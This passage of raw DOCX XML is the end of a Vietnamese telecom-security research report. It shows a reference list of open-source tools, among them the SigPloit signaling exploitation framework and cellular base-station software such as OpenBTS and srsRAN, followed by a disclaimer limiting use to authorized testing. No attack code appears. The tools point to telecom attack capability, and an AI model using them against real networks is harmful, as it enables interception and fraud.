        <w:t xml:space="preserve">Phần Mềm và Công Cụ Mã Nguồn Mở</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SigPloiter.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SigPloit – Telecom Signaling Exploitation Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GitHub: github.com/SigPloiter/SigPloit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Software Radio Systems.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">srsRAN 4G Documentation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. srs.io, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OpenBTS Project.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">OpenBTS: Open Source GSM Base Station</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Range Networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EURECOM.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">OpenAirInterface5G: Open Source LTE/5G Software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. gitlab.eurecom.fr/oai/openairinterface5g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The GNU Radio Project.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">GNU Radio Documentation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. gnuradio.org, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ferraris, D.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">gr-dvbt2: DVB-T2 transmitter in GNU Radio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GitHub: github.com/drmpeg/gr-dvbt2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pycrate Library.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">pycrate: A software suite for parsing and crafting network protocols</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. GitHub: github.com/P1sec/pycrate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Báo cáo này được biên soạn cho mục đích nghiên cứu và giáo dục chuyên ngành an toàn thông tin viễn thông. Các kỹ thuật mô tả được ghi nhận trong tài liệu học thuật quốc tế và hội thảo bảo mật uy tín. Việc ứng dụng ngoài môi trường được ủy quyền hợp pháp (authorized penetration testing, nghiên cứu có kiểm soát, môi trường lab riêng biệt) có thể vi phạm Điều 224–226 Bộ luật Hình sự Việt Nam về tội phạm máy tính và viễn thông, cũng như các điều khoản tương đương tại các quốc gia khác.</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2026-06-08T07:53:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-08T07:53:16Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>